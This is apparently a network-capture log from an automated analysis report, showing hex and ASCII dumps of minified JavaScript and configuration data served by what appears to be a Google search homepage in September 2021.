69 62
                                                                                                                                                                      Data Ascii: |(b="about:invalid#zClosurez"),b=new v(b,t)),a.href=b instanceof v&&b.constructor===v?b.g:"type_error:SafeUrl")},Ma=function(a,b){null==b||b.stopPropagation();a.i&&a.s&&!a.v&&(a.i.style.display="block",a.v=!0,a.L&&Ia(a.i.querySelector("li")),a.s.setAttrib
                                                                                                                                                                      2021-09-14 14:03:24 UTC142INData Raw: 6e 67 28 64 29 29 3b 64 26 26 28 64 3d 21 30 2c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29 26 26 28 64 3d 64 2e 6a 6f 69 6e 28 22 20 22 29 29 2c 22 22 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 64 3f 28 52 7c 7c 28 52 3d 7b 61 74 6f 6d 69 63 3a 21 31 2c 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3a 22 6e 6f 6e 65 22 2c 64 72 6f 70 65 66 66 65 63 74 3a 22 6e 6f 6e 65 22 2c 68 61 73 70 6f 70 75 70 3a 21 31 2c 6c 69 76 65 3a 22 6f 66 66 22 2c 6d 75 6c 74 69 6c 69 6e 65 3a 21 31 2c 6d 75 6c 74 69 73 65 6c 65 63 74 61 62 6c 65 3a 21 31 2c 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 22 76 65 72 74 69 63 61 6c 22 2c 72 65 61 64 6f 6e 6c 79 3a 21 31 2c 72 65 6c 65 76 61 6e 74 3a 22 61 64 64 69 74 69 6f 6e 73 20 74 65 78 74 22 2c 72 65 71 75 69 72 65 64 3a 21 31 2c 73 6f 72
                                                                                                                                                                      Data Ascii: ng(d));d&&(d=!0,Array.isArray(d)&&(d=d.join(" ")),""===d||void 0==d?(R||(R={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sor
                                                                                                                                                                      2021-09-14 14:03:24 UTC143INData Raw: 72 6e 20 57 28 62 2c 61 2e 44 2c 63 55 29 7d 2c 61 2e 44 2e 6f 6e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 55 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 28 62 2c 61 2e 44 2c 63 55 29 7d 29 7d 29 3b 61 2e 73 26 26 28 61 2e 73 2e 6f 6e 63 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 4d 61 28 61 2c 62 29 7d 2c 61 2e 73 2e 6f 6e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 55 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 28 61 2c 62 29 7d 29 7d 29 3b 61 2e 69 26 26 0a 28 61 2e 69 2e 6f 6e 63 6c 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 4a 61 28 61 2c 62 29 7d 2c 61 2e 69 2e
                                                                                                                                                                      Data Ascii: rn W(b,a.D,cU)},a.D.onkeydown=function(b){return U(a,b,function(){return W(b,a.D,cU)})});a.s&&(a.s.onclick=function(b){return Ma(a,b)},a.s.onkeydown=function(b){return U(a,b,function(){return Ma(a,b)})});a.i&&(a.i.onclick=function(b){return Ja(a,b)},a.i.
                                                                                                                                                                      2021-09-14 14:03:24 UTC145INData Raw: 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 4d 6f 75 73 63 22 29 3b 74 68 69 73 2e 76 3d 21 31 3b 74 68 69 73 2e 6c 3d 30 3b 74 68 69 73 2e 43 3d 74 68 69 73 2e 69 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 6c 69 22 29 3b 74 68 69 73 2e 58 3d 74 68 69 73 2e 43 2e 6c 65 6e 67 74 68 2d 31 3b 74 68 69 73 2e 4f 3d 30 3b 74 68 69 73 2e 57 3d 74 68 69 73 2e 4c 3d 21 31 3b 74 68 69 73 2e 55 3d 21 30 3b 74 68 69 73 2e 4b 3d 21 31 3b 74 68 69 73 2e 41 3d 74 68 69 73 2e 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 2c 20 62 75 74 74 6f 6e 22 29 3b 74 68 69 73 2e 54 3d 74 68 69 73 2e 41 2e 6c 65 6e 67 74 68 2d 31 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 59 3d 21 31 3b 74 68 69 73 2e 50 3d 5b 5d 7d 3b 28 66 75 6e 63 74 69 6f
                                                                                                                                                                      Data Ascii: t.getElementById("uMousc");this.v=!1;this.l=0;this.C=this.i.querySelectorAll("li");this.X=this.C.length-1;this.O=0;this.W=this.L=!1;this.U=!0;this.K=!1;this.A=this.h.querySelectorAll("a, button");this.T=this.A.length-1;this.B=this.Y=!1;this.P=[]};(functio
                                                                                                                                                                      2021-09-14 14:03:24 UTC146INData Raw: 2e 30 0a 2a 2f 0a 5f 2e 53 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 5f 2e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 7c 7c 21 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 61 3d 21 31 2c 62 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 7b 7d 2c 22 70 61 73 73 69 76 65 22 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 61 3d 21 30 7d 7d 29 3b 74 72 79 7b 5f 2e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 5f 2e 48 61 2c 62 29 2c 5f 2e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 5f 2e 48 61 2c 62 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 20 61 7d 28 29 3b 0a 5f 2e 54
                                                                                                                                                                      Data Ascii: .0*/_.Sd=function(){if(!_.t.addEventListener||!Object.defineProperty)return!1;var a=!1,b=Object.defineProperty({},"passive",{get:function(){a=!0}});try{_.t.addEventListener("test",_.Ha,b),_.t.removeEventListener("test",_.Ha,b)}catch(c){}return a}();_.T
                                                                                                                                                                      2021-09-14 14:03:24 UTC147INData Raw: 6e 65 77 20 47 68 28 5f 2e 46 64 29 3b 5f 2e 67 64 28 22 64 64 22 2c 49 68 29 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 6b 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 62 3d 62 7c 7c 5f 2e 74 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 6e 75 6c 6c 3d 3d 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 7d 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 6c 6a 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 67 62 5f 4e 61 20 2e
                                                                                                                                                                      Data Ascii: new Gh(_.Fd);_.gd("dd",Ih);}catch(e){_._DumpException(e)}try{_.kj=function(a,b){a=a.split(".");b=b||_.t;for(var c=0;c<a.length;c++)if(b=b[a[c]],null==b)return null;return b};}catch(e){_._DumpException(e)}try{var lj=document.querySelector(".gb_Na .
                                                                                                                                                                      2021-09-14 14:03:24 UTC149INData Raw: 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 63 65 69 6c 28 74 68 69 73 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 66 6c 6f 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 77 69 64 74 68 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 68 65 69 67 68 74 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5f 2e 68 2e 72 6f 75 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 77 69 64 74 68 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 77 69 64 74 68 29 3b 74 68 69 73 2e 68 65 69 67 68 74 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69
                                                                                                                                                                      Data Ascii: Math.ceil(this.width);this.height=Math.ceil(this.height);return this};_.h.floor=function(){this.width=Math.floor(this.width);this.height=Math.floor(this.height);return this};_.h.round=function(){this.width=Math.round(this.width);this.height=Math.round(thi
                                                                                                                                                                      2021-09-14 14:03:24 UTC150INData Raw: 2c 22 64 61 74 61 2d 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 3d 63 7d 29 7d 3b 65 65 3d 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 22 63 65 6c 6c 50 61 64 64 69 6e 67 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 22 63 65 6c 6c 53 70 61 63 69 6e 67 22 2c 63 6f 6c 73 70 61 6e 3a 22 63 6f 6c 53 70 61 6e 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 22 66 72 61 6d 65 42 6f 72 64 65 72 22 2c 68 65 69 67 68 74 3a 22 68 65 69 67 68 74 22 2c 6d 61 78 6c 65 6e 67 74 68 3a 22 6d 61 78 4c 65 6e 67 74 68 22 2c 6e 6f 6e 63 65 3a 22 6e 6f 6e 63 65 22 2c 72 6f 6c 65 3a 22 72 6f 6c 65 22 2c 72 6f 77 73 70 61 6e 3a 22 72 6f 77 53 70 61 6e 22 2c 74 79 70 65 3a 22 74 79 70 65 22 2c 75 73 65 6d 61 70 3a 22 75 73 65 4d 61 70 22 2c 76 61 6c 69 67
                                                                                                                                                                      Data Ascii: ,"data-")?a.setAttribute(d,c):a[d]=c})};ee={cellpadding:"cellPadding",cellspacing:"cellSpacing",colspan:"colSpan",frameborder:"frameBorder",height:"height",maxlength:"maxLength",nonce:"nonce",role:"role",rowspan:"rowSpan",type:"type",usemap:"useMap",valig
                                                                                                                                                                      2021-09-14 14:03:24 UTC151INData Raw: 29 3b 29 7b 69 66 28 62 28 61 29 29 72 65 74 75 72 6e 20 61 3b 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 64 2b 2b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 71 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 43 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 71 28 5f 2e 71 6a 2c 5f 2e 43 29 3b 0a 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 72 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 72 65 6c 3d 63 3b 2d 31 21 3d 63 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 73 74 79 6c 65 73 68 65 65 74 22 29 3f 28 61 2e 68 72 65
                                                                                                                                                                      Data Ascii: );){if(b(a))return a;a=a.parentNode;d++}return null};}catch(e){_._DumpException(e)}try{_.qj=function(a){_.C.call(this,a)};_.q(_.qj,_.C);}catch(e){_._DumpException(e)}try{_.rj=function(a,b,c){a.rel=c;-1!=c.toLowerCase().indexOf("stylesheet")?(a.hre
                                                                                                                                                                      2021-09-14 14:03:24 UTC152INData Raw: 7d 7d 2c 41 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 43 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 71 28 41 6a 2c 5f 2e 43 29 3b 0a 76 61 72 20 42 6a 3d 5f 2e 48 28 5f 2e 42 64 2c 41 6a 2c 31 37 29 7c 7c 6e 65 77 20 41 6a 2c 43 6a 2c 7a 6a 3d 28 43 6a 3d 5f 2e 48 28 42 6a 2c 5f 2e 71 6a 2c 31 29 29 3f 5f 2e 64 62 28 5f 2e 45 28 43 6a 2c 34 29 7c 7c 22 22 29 3a 6e 75 6c 6c 2c 44 6a 2c 45 6a 3d 28 44 6a 3d 5f 2e 48 28 42 6a 2c 5f 2e 71 6a 2c 32 29 29 3f 5f 2e 64 62 28 5f 2e 45 28 44 6a 2c 34 29 7c 7c 22 22 29 3a 6e 75 6c 6c 2c 46 6a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 78 6a 28 31 2c 32 29 3b 69 66 28 45 6a 29 7b 76 61 72 20 61 3d 5f 2e 6a 65 28 22 4c 49 4e 4b 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 74 65
                                                                                                                                                                      Data Ascii: }},Aj=function(a){_.C.call(this,a)};_.q(Aj,_.C);var Bj=_.H(_.Bd,Aj,17)||new Aj,Cj,zj=(Cj=_.H(Bj,_.qj,1))?_.db(_.E(Cj,4)||""):null,Dj,Ej=(Dj=_.H(Bj,_.qj,2))?_.db(_.E(Dj,4)||""):null,Fj=function(){xj(1,2);if(Ej){var a=_.je("LINK");a.setAttribute("type","te
                                                                                                                                                                      2021-09-14 14:03:24 UTC154INData Raw: 2c 73 69 66 3a 74 72 75 65 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 61 61 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 61 62 64 5c 78 32 32 3a 7b 5c 78 32 32 61 62 64 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 64 65 62 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 64 65 74 5c 78 32 32 3a 66 61 6c 73 65 7d 2c 5c 78 32 32 61 73 79 6e 63 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 63 64 6f 73 5c 78 32 32 3a 7b 5c 78 32 32 63 64 6f 62 73 65 6c 5c 78 32 32 3a 66 61 6c 73 65 7d 2c 5c 78 32 32 63 72 5c 78 32 32 3a 7b 5c 78 32 32 71 69 72 5c 78 32 32 3a 66 61 6c 73 65 2c 5c 78 32 32 72 63 74 6a 5c 78 32 32 3a 74 72
                                                                                                                                                                      Data Ascii: ,sif:true,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22aa\x22:{},\x22abd\x22:{\x22abd\x22:false,\x22deb\x22:false,\x22det\x22:false},\x22async\x22:{},\x22cdos\x22:{\x22cdobsel\x22:false},\x22cr\x22:{\x22qir\x22:false,\x22rctj\x22:tr
                                                                                                                                                                      2021-09-14 14:03:24 UTC155INData Raw: 5c 78 33 64 72 65 73 74 61 75 72 61 6e 74 73 2b 6e 65 61 72 62 79 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 68 75 6e 67 72 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 48 75 6e 67 72 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 73 65 61 72 63 68 3f 67 77 73 5f 72 64 5c 78 33 64 73 73 6c 5c 5c 75 30 30 32 36 71 5c 78 33 64 66 6c 69 70 2b 61 2b 63 6f 69 6e 5c 5c 75 30 30 32 36 63 73 66 5c 78 33 64 62 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 61 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 41 64 76 65 6e 74 75 72 6f 75 73 5c 78 32 32
                                                                                                                                                                      Data Ascii: \x3drestaurants+nearby\x22,\x22id\x22:\x22hungry\x22,\x22msg\x22:\x22I\x27m Feeling Hungry\x22},{\x22href\x22:\x22/search?gws_rd\x3dssl\\u0026q\x3dflip+a+coin\\u0026csf\x3db\x22,\x22id\x22:\x22adventurous\x22,\x22msg\x22:\x22I\x27m Feeling Adventurous\x22
                                                                                                                                                                      2021-09-14 14:03:24 UTC156INData Raw: 77 30 68 58 67 7a 44 4d 54 78 36 36 75 6e 5a 61 4e 38 41 4e 4a 48 41 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78 32 32 3a 5c 78 32 32 74 72 65 6e 64 79 5c 78 32 32 2c 5c 78 32 32 6d 73 67 5c 78 32 32 3a 5c 78 32 32 49 5c 78 32 37 6d 20 46 65 65 6c 69 6e 67 20 54 72 65 6e 64 79 5c 78 32 32 7d 2c 7b 5c 78 32 32 68 72 65 66 5c 78 32 32 3a 5c 78 32 32 2f 75 72 6c 3f 75 72 6c 5c 78 33 64 68 74 74 70 73 3a 2f 2f 61 72 74 73 61 6e 64 63 75 6c 74 75 72 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 61 72 74 6e 65 72 2f 6d 75 73 65 6f 2d 72 65 69 6e 61 2d 73 6f 66 69 61 5c 5c 75 30 30 32 36 73 61 5c 78 33 64 74 5c 5c 75 30 30 32 36 75 73 67 5c 78 33 64 41 4f 76 56 61 77 33 53 39 58 70 41 65 49 4c 6e 51 7a 5a 54 63 63 70 31 62 41 50 6c 5c 78 32 32 2c 5c 78 32 32 69 64 5c 78
                                                                                                                                                                      Data Ascii: w0hXgzDMTx66unZaN8ANJHA\x22,\x22id\x22:\x22trendy\x22,\x22msg\x22:\x22I\x27m Feeling Trendy\x22},{\x22href\x22:\x22/url?url\x3dhttps://artsandculture.google.com/partner/museo-reina-sofia\\u0026sa\x3dt\\u0026usg\x3dAOvVaw3S9XpAeILnQzZTccp1bAPl\x22,\x22id\x
                                                                                                                                                                      2021-09-14 14:03:24 UTC157INData Raw: 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 31 2c 31 2c 30 2c 6e 75 6c 6c 2c 5c 78 32 32 5c 78 32 32 2c 30 5d 27 5d 3b 0a 76 61 72 20 61 3d 6d 3b 77 69 6e 64 6f 77 2e 57 5f 6a 64 3d 77 69 6e 64 6f 77 2e 57 5f 6a 64 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 3d 32 29 77 69 6e 64 6f 77 2e 57 5f 6a 64 5b 61 5b 62 5d 5d 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 61 5b 62 2b 31 5d 29 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 3d 7b 22 53 30 36 47 72 62 22 3a 22 22 2c 22 7a 43 68 4a 6f 64 22 3a 22 25 2e 40 2e 5d 22 2c 22 53 4e 6c 4d 30 65 22 3a 22 22 2c 22 77 32 62 74 41 65 22 3a 22 25 2e 40 2e 5c 22 5c 22 2c
                                                                                                                                                                      Data Ascii: null,null,null,null,0,null,1,1,0,null,\x22\x22,0]'];var a=m;window.W_jd=window.W_jd||{};for(var b=0;b<a.length;b+=2)window.W_jd[a[b]]=JSON.parse(a[b+1]);})();(function(){window.WIZ_global_data={"S06Grb":"","zChJod":"%.@.]","SNlM0e":"","w2btAe":"%.@.\"\",
                                                                                                                                                                      2021-09-14 14:03:24 UTC159INData Raw: 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 64 61 64 63 65 30 22 2c 22 23 30 30 30 22 2c 22 23 31 61 37 33 65 38 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 36 29 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 35 34 29 22 2c 22 72 67 62 61 0d 0a
                                                                                                                                                                      Data Ascii: "#dadce0","#000","#dadce0","#000","#1a73e8",false,false,false,false,false,false,true,false,false,false,false,false,"rgba(0,0,0,.12)","rgba(0,0,0,.26)","rgba(0,0,0,.54)","rgba
                                                                                                                                                                      2021-09-14 14:03:24 UTC159INData Raw: 32 32 34 31 0d 0a 28 30 2c 30 2c 30 2c 2e 38 37 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 31 35 29 22 2c 22 72 67 62 61 28 32 30 34 2c 32 30 34 2c 32 30 34 2c 2e 32 35 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 32 30 29 22 2c 22 72 67 62 61 28 31 31 32 2c 31 31 37 2c 31 32 32 2c 2e 34 30 29 22 2c 22 23 34 32 38 35 66 34 22 2c 22 23 31 35 35 38 64 36 22 2c 22 23 33 34 61 38 35 33 22 2c 22 23 65 61 34 33 33 35 22 2c 22 23 66 62 62 63 30 34 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 66 38 66 39 66 61 22 2c 22 23 37 30 37 35 37 61 22 2c 22 23 32 30 32 31 32 34 22 2c 22 23 33 34 61 38 35 33 22 2c 22 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 22 2c 22 23 33 32 33 32 33 32 22 2c 22 23
                                                                                                                                                                      Data Ascii: 2241(0,0,0,.87)","rgba(204,204,204,.15)","rgba(204,204,204,.25)","rgba(112,117,122,.20)","rgba(112,117,122,.40)","#4285f4","#1558d6","#34a853","#ea4335","#fbbc04","#f8f9fa","#f8f9fa","#f8f9fa","#70757a","#202124","#34a853","rgba(0,0,0,.12)","#323232","#
                                                                                                                                                                      2021-09-14 14:03:24 UTC160INData Raw: 5c 22 23 66 66 66 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 64 31 64 31 64 31 5c 22 2c 5c 22 23 66 66 66 5c 22 2c 6e 75 6c 6c 2c 31 2c 6e 75 6c 6c 2c 31 34 2c 35 30 30 2c 5c 22 23 31 39 36 37 64 32 5c 22 2c 5c 22 34 70 78 5c 22 2c 5c 22 23 31 61 37 33 65 38 5c 22 2c 5c 22 23 65 65 65 65 65 65 5c 22 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40 2e 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 5d 2c 30 2c 6e 75 6c 6c 2c 30 2c 30 5d 22 2c 22 65 6e 2d 47 42 22 2c 22 25 2e 40 2e 5c 22 31 33 70 78 5c 22 2c 5c 22 31 36 70 78 5c 22 2c 5c 22 31 31 70 78 5c 22 5d 22 2c 22 25 2e 40 2e 5c 22 31 30 70 78 5c 22 2c 31 30 2c 5c 22 31 36 70 78 5c 22 2c 31 36 5d 22 2c 22 25 2e 40 2e 5c 22 31 34 70 78 5c 22 2c 31 34 5d 22 2c 22 25 2e 40 2e 34 30 5d 22 2c 6e 75 6c 6c 2c 22 25 2e 40
                                                                                                                                                                      Data Ascii: \"#fff\",\"#1a73e8\",\"#d1d1d1\",\"#fff\",null,1,null,14,500,\"#1967d2\",\"4px\",\"#1a73e8\",\"#eeeeee\"]",null,"%.@.[null,null,1],0,null,0,0]","en-GB","%.@.\"13px\",\"16px\",\"11px\"]","%.@.\"10px\",10,\"16px\",16]","%.@.\"14px\",14]","%.@.40]",null,"%.@
                                                                                                                                                                      2021-09-14 14:03:24 UTC161INData Raw: 61 28 36 30 2c 36 34 2c 36 37 2c 30 2e 32 34 29 5c 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 20 23 64 61 64 63 65 30 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 5d 22 2c 22 25 2e 40 2e 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6d 65 64 69 75 6d 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2d 6c 69 67 68 74 2c
                                                                                                                                                                      Data Ascii: a(60,64,67,0.24)\",null,null,\"1px solid #dadce0\",\"none\",\"none\",\"none\"]","%.@.\"Google Sans,arial,sans-serif\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"arial,sans-serif\",\"arial,sans-serif-medium,sans-serif\",\"arial,sans-serif-light,
                                                                                                                                                                      2021-09-14 14:03:24 UTC163INData Raw: 6f 67 6c 65 20 53 61 6e 73 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 5c 22 2c 5c 22 33 32 70 78 5c 22 2c 5c 22 32 34 70 78 5c 22 2c 6e 75 6c 6c 2c 5c 22 35 30 30 5c 22 5d 22 2c 22 25 2e 40 2e 34 5d 22 2c 22 25 2e 40 2e 5c 22 31 34 70 78 5c 22 2c 31 34 2c 5c 22 31 36 70 78 5c 22 2c 31 36 2c 5c 22 30 5c 22 2c 30 2c 5c 22 6e 6f 6e 65 5c 22 2c 36 33 32 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 23 64 66 65 31 65 35 5c 22 2c 5c 22 6e 6f 72 6d 61 6c 5c 22 2c 5c 22 6e 6f 72 6d 61 6c 5c 22 2c 5c 22 23 37 30 37 35 37 61 5c 22 2c 5c 22 31 32 70 78 5c 22 2c 5c 22 31 2e 33 34 5c 22 2c 5c 22 31 70 78 20 73 6f 6c 69 64 20 23 64 66 65 31 65 35 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 30 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e 65 5c 22 2c 5c 22 6e 6f 6e
                                                                                                                                                                      Data Ascii: ogle Sans,arial,sans-serif\",\"32px\",\"24px\",null,\"500\"]","%.@.4]","%.@.\"14px\",14,\"16px\",16,\"0\",0,\"none\",632,\"1px solid #dfe1e5\",\"normal\",\"normal\",\"#70757a\",\"12px\",\"1.34\",\"1px solid #dfe1e5\",\"none\",\"0\",\"none\",\"none\",\"non
                                                                                                                                                                      2021-09-14 14:03:24 UTC164INData Raw: 38 34 31 2c 34 30 32 30 2c 39 37 38 2c 31 33 32 32 38 2c 33 38 34 37 2c 33 37 37 36 2c 34 31 36 2c 36 34 33 34 2c 33 39 33 30 2c 34 34 38 2c 31 32 2c 38 36 36 2c 31 32 2c 35 2c 37 2c 31 33 37 36 33 2c 31 33 2c 32 37 36 32 2c 39 31 39 2c 35 30 38 31 2c 36 32 2c 31 35 33 31 2c 31 32 37 39 2c 32 32 31 32 2c 35 33 30 2c 31 34 39 2c 31 31 30 33 2c 38 34 30 2c 32 31 39 36 2c 34 31 30 31 2c 31 30 39 2c 32 30 30 33 2c 31 34 30 32 2c 36 30 36 2c 32 30 32 35 2c 31 37 37 35 2c 35 32 30 2c 35 37 36 36 2c 32 35 37 2c 36 30 37 30 2c 32 35 37 37 2c 33 32 32 37 2c 32 38 34 35 2c 37 2c 34 38 30 38 2c 37 39 31 2c 36 37 35 35 2c 35 30 39 36 2c 37 35 34 30 2c 33 37 39 39 2c 34 39 38 31 2c 39 30 38 2c 32 2c 39 34 31 2c 32 36 31 34 2c 33 37 38 33 2c 39 33 35 39 